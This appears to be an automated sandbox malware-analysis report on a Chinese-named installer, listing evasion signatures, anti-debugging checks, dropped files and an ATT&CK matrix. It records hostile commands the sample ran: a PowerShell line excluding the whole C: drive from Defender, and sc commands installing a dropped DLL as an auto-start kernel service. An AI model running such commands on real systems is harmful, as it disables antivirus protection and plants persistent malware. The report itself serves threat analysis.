Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6208Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3651Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpWindow / User API: threadDelayed 605Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpWindow / User API: threadDelayed 602Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpWindow / User API: threadDelayed 542Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-B21TE.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C15AEC0 FindFirstFileA,FindClose,FindClose,6_2_6C15AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_009F6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_009F7496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F9C60 GetSystemInfo,10_2_009F9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000002.1807351130.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000002.1807351130.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6BFE3886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6BFE3886
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C170181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C170181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00A757D0
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C179D35 mov eax, dword ptr fs:[00000030h]6_2_6C179D35
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C179D66 mov eax, dword ptr fs:[00000030h]6_2_6C179D66
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C16F17D mov eax, dword ptr fs:[00000030h]6_2_6C16F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C168CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C168CBD
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C170181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C170181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C237720 cpuid 6_2_6C237720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009FAB2A GetSystemTimeAsFileTime,10_2_009FAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A90090 GetVersion,10_2_00A90090
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory321
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
